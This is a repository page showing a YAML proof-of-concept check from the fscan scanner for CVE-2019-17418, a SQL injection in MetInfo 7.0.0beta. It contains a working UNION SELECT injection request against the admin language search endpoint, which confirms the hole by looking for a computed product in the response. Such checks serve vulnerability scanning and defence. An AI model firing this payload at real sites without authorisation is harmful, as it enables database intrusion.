qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/Web_Scan/pocs/metinfo-cve-2019-17418-sqli...

17 lines
549 B
YAML
Raw Blame History

name: poc-yaml-metinfo-cve-2019-17418-sqli
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: GET
path: >-
/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+{{r1}}*{{r2}},1--+&site=admin
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: JingLing(https://hackfun.org/)
metinfo_version: 7.0.0beta
links:
- https://github.com/evi1code/Just-for-fun/issues/2
Reference in New Issue View Git Blame Copy Permalink